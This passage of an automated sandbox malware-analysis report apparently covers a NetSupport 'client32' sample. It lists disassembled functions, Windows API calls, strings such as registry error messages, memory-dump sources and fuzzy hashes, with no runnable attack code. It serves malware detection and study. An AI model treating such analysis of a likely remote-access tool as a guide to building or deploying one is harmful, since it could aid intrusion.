                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenwvsprintf
                                                                              • String ID: Error %d Opening regkey %s
                                                                              • API String ID: 1772833024-3994271378
                                                                              • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                              • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                              • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                              • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                              Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Closewvsprintf
                                                                              • String ID: Error %d closing regkey %x
                                                                              • API String ID: 843752472-892920262
                                                                              • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                              • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                              • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                              • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                              Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,0157B888,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HandleLibraryLoadModule
                                                                              • String ID: NSMTRACE
                                                                              • API String ID: 4133054770-4175627554
                                                                              • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                              • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                              • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                              • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                              Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: psapi.dll
                                                                              • API String ID: 1029625771-80456845
                                                                              • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                              • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                              • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                              • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                              Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: nslsp.dll
                                                                              • API String ID: 1029625771-3933918195
                                                                              • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                              • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                              • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                              • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                              Function 11075090 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110750EF
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeLibrary_memset
                                                                              • String ID:
                                                                              • API String ID: 1654520187-0
                                                                              • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                              • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                              • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                              • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                              Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 110608C3
                                                                              • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID:
                                                                              • API String ID: 1338273076-0
                                                                              • Opcode ID: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                              • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                              • Opcode Fuzzy Hash: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                              • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                              Function 1105F7C0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memmove
                                                                              • String ID:
                                                                              • API String ID: 1183979061-0
                                                                              • Opcode ID: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                              • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                              • Opcode Fuzzy Hash: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                              • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                              Function 110886C0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110886DF
                                                                              • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection_memset
                                                                              • String ID:
                                                                              • API String ID: 453477542-0
                                                                              • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                              • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                              • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                              • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                              Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                              • ExtractIconExA.SHELL32(?,00000000,0008045F,000802D1,00000001), ref: 11145068
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExtractFileIconModuleName
                                                                              • String ID:
                                                                              • API String ID: 3911389742-0
                                                                              • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                              • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                              • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                              • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                              Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                              • __lock_file.LIBCMT ref: 11164CBE
                                                                                • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                              • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                              • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                              • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                              • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                              Function 1117602D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 11176045
                                                                                • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                              • __tzset_nolock.LIBCMT ref: 11176056
                                                                                • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
